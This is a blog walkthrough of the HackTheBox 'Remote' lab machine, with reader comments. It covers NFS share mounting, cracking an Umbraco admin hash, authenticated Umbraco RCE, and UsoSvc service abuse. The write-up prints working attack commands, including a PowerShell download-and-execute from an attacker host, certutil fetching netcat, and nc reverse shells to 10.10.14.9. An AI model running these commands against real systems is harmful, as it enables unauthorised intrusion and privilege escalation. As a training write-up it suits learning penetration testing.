Remote HacktheBox Walkthrough
This is Remote HackTheBox Walkthrough. In this writeup I will show you how I successfully exploited Remote machine and got root flag. The Remote machine is given difficulty level low by its maker. So without wasting time let’s jump into the box. Connect your PC with VPN so that you can get access to the Remote machine. Once successfully connected confirm by pinging the IP 10.10.10.180 [IP for Remote htb Machine].
Now I will show you how I got root to this machine.
First of all scanned the IP 10.10.10.180 so that I could get information about open ports and banner grab the services running on them. For this task used nmap (network port scanner). Here is the result
$nmap -sC -sV -oA scan 10.10.10.180
Nmap Result shows port 21 is open and
ftp service is running on it. Also anonymous Login is allowed that’s interesting. So first of all tried to login with the credential
anonymous : anonymous and got logged in successfully.
Anonymous FTP Login
All the command were working but they are not showing any output. Then tried to upload a blank text file named
inject.txt but it gave me access denied permission. Then tried to download all the shared files (if any) from the ftp server in case I have missed some files from anonymous login.
$wget -m ftp://anonymous:[email protected]
which appeared that there is nothing to show or we don’t have enough permission to access them.
That’s all about ftp service. Let’s move to other services
Enumerating on Port 80
Port 80 is open, so there may be some web server running over this port. Let’s check it.
After scrolling to bottom at http://10.10.10.180/ saw Umbraco HQ and on product page saw Umbraco printed on the jacket. Also, there were some balls and each have Umbraco written on it. Didn’t know why same thing is written on every page and pointing to Umbraco.
Seriously didn’t know. I downloaded the image of man from http://10.10.10.180/media/1002/18095416144_44a566a5f4_h.jpg by right clicking on it and then searched 18095416144_44a566a5f4_h.jpg on google. Luckily, found third link which is https://our.umbraco.com/documentation/Umbraco-Heartcore/API-Documentation/Content-Management/media/ and after going to the page saw that it is actually a CMS (a Content Management System just like WordPress).
So from above confirmed myself that this website is running on UMBRACO CMS which is an open source Content Management System.
Tip: If you find any CMS being used then try to check over GitHub if there is any CMS scanner for particular CMS is present. If present then try to scan the website using that scanner. This may give you more accurate and fast result.
Till now I knew the CMS on which the website is running. To proceed further I needed
installation folder of CMS and the
version of CMS using which I could search for public exploit. Left it here and tried to find some other means by which I could get the installation folder and version of the CMS. Also, could not find any Umbraco CMS scanner over GitHub.
Port 111 is open, let’s enumerate it. It is running
rpcbind service. The nmap scan report clearly shows rpcinfo (Remote Procedure Call Information) and list of ports along with their services. For confirmation and removal of false positive results you can use the command
rpcinfo to reveal the exact running services.
$ rpcinfo -p 10.10.10.180
Rpcinfo revealed that
nfs [Network file System] and
mounted services are running so used
showmount command to list the directory which can be mounted on our local machine.
Checking Mount Directory
$showmount --exports 10.10.10.180
Showmount command reveals that
/site_backups can be mounted on our local machine.
So mounted the directory
/site_backup on my local computer inside the folder
Mounting to Local Computer
$mount --types nfs 10.10.10.180:/site_backups /tmp/mounted_folder/
Umbraco folder. So the installation URL for Umbraco is http://10.10.10.180/Umbraco/. Now I needed the version of Umbraco. No idea in which file it is present, except googling. And this helped me to find the answer. The version is
$cat Web.config | grep 'umbracoConfigurationStatus'
As soon as I got the version of Umbraco, immediately searched for available
searchsploit (Command line tool for searching exploits on Exploit-db database). Got an exploit which is
Authenticated Remote Code Execution (46153.py).
Search Available Exploits
$ searchsploit Umbraco 7.12.4
After going to http://10.10.10.180/umbraco got
login panel which requires
password. Tried to login with default credentials
admin : admin &
admin : password but it failed. So tried to search in our mounted_folder if I could get some credentials.
After some enumeration got a file named
Umbraco.sdf [.sdf file contains SQL database in compact form] and used
strings command to view the file content and
grep admin from the file which is shown below
$strings Umbraco.sdf | grep admin
It contains username :
[email protected] and password in
SHA1 hash form which is ‘
b8be16afba8c314ad33d812f22a04991b90e2aaa‘. Tried to search the hash online on some public databases and luckily got its password on
crackstation.net which is
baconandcheese. So the login credential is
Tip: If you get any hash then first of all try to search it online in databases like crackstation.net or others whether its value is present or not. If not found then try to crack it on your machine with custom wordlist using JohnTheRipper or HashCat
As there is an authenticated RCE vulnerability in Umbraco 7.12.4 so searched over GitHub for Umbraco RCE exploit and its usage. Got this link https://github.com/noraj/Umbraco-RCE and downloaded it. Then downloaded PowerShell script
Invoke-PowerShellTcp.ps1 from https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
which helps to connect back to the netcat listener on our PC. Replaced the old IP address with my local PC IP address port 5555.
python http server in one window and in another window started
netcat listener with
rlwrap command. Used rlwrap command so that after getting remote shell our backspace and tab button should function smoothly. After executing
$python exploit.py -u [email protected] -p baconandcheese -i http://10.10.10.180/ -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.9/Invoke-PowerShellTcp.ps1')"
Start Python Http Server
$python3 -m http.server 80
Start NetCat Listener
$rlwrap nc -nvlp 5555
Got remote shell. So using this exploit logged in successfully into the remote PC.
Gathering some useful info
Let’s grab user flag
Finding PrivEsc Vector
To escalate privilege to admin level, first of all I had to know the
Privilege Escalation vector only then I could proceed further towards the exploitation part. Used
PowerUp.ps1 script to run remotely if I could get some possible privilege escalation vector. Using this command it run it directly on remote PC and then don’t forget to invoke all checks.
Running PrivEsc Script
$ IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9/PowerUp.ps1')
Tip: Every time you get access to any PC try to run some Enumeration Script, so that you can get information about privilege escalation vector.
UsoSvc could be our potential privilege escalation vector. Let’s try to exploit it. To exploit this service we require a software that will execute command from this PC to remote machine. So downloaded netcat from https://eternallybored.org/misc/netcat/netcat-win32-1.12.zip and downloaded
nc64.exe to remote machine from my PC. And finally run the service abuse command as given in PowerUp.ps1 script output to get administrative remote shell.
Download nc64.exe to Remote
$certutil.exe -urlcache -f http://10.10.14.9/nc64.exe C:\\Windows\Temp\nc64.exe
Start Python Http Server Locally
$python3 -m http.server 80
Start NetCat Listener Locally
$rlwrap nc -nvlp 1234
Run the Service Abuse Command
$Invoke-ServiceAbuse -ServiceName 'UsoSvc' -Command "C:\Windows\Temp\nc64.exe 10.10.14.9 1234 -e cmd.exe"
We can see we have successfully got an administrative shell. Now we can get our root flag
Hope you have got something to learn from Remote HackTheBox Walkthrough and my methodology. If yes, please comment in the comment section. For any query and suggestion feel free to contact us at [email protected]
This Post Has 8 Comments
me podias pasr el PowerUp.ps1 te voy agradecer.
It seems that this part ist not anymore functional :
Invoke-ServiceAbuse -ServiceName ‘UsoSvc’ -Command “C:\Windows\Temp\nc64.exe 10.10.14.9 1234 -e cmd.exe”
Start-Service : Service ‘Update Orchestrator Service (UsoSvc)’ cannot be started due to the following error: Cannot
start service UsoSvc on computer ‘.’.
At line:1812 char:34
+ … $TargetService | Start-Service -ErrorAction SilentlyContinue
+ CategoryInfo : OpenError: (System.ServiceProcess.ServiceController:ServiceController) [Start-Service],
+ FullyQualifiedErrorId : CouldNotStartService,Microsoft.PowerShell.Commands.StartServiceCommand
I worked around in doing this :
Set-ServiceBinPath -ServiceName ‘UsoSvc’ “C:\Windows\Temp\nc64.exe 10.10.14.9 1234 -e cmd.exe”
NOTICE : the service is only functional for around 5 mn, enough to catch the root flag, but why is it broken after this time period ? Antivirus ?
Very good job done in this walkthrough !!
How without given tun0 ip and port you were able to get reverse shell and where you had defined the port in 5555 script ??
I have changed IP address to tun0 IP and port to 5555 in the powershell script PowerShellTcp.ps1 before downloading it to Remote HTB machine through python http server.
Can you explain to me exactly what this Powershell statement does -i http://10.10.10.180/ -c powershell.exe -a “IEX (New-Object Net.WebClient) .DownloadString (‘http://10.10.14.9/Invoke -PowerShellTcp.ps1 ‘) “
This statement will download and execute Invoke-PowerShellTcp.ps1 script simultaneously on remote machine by loading into the memory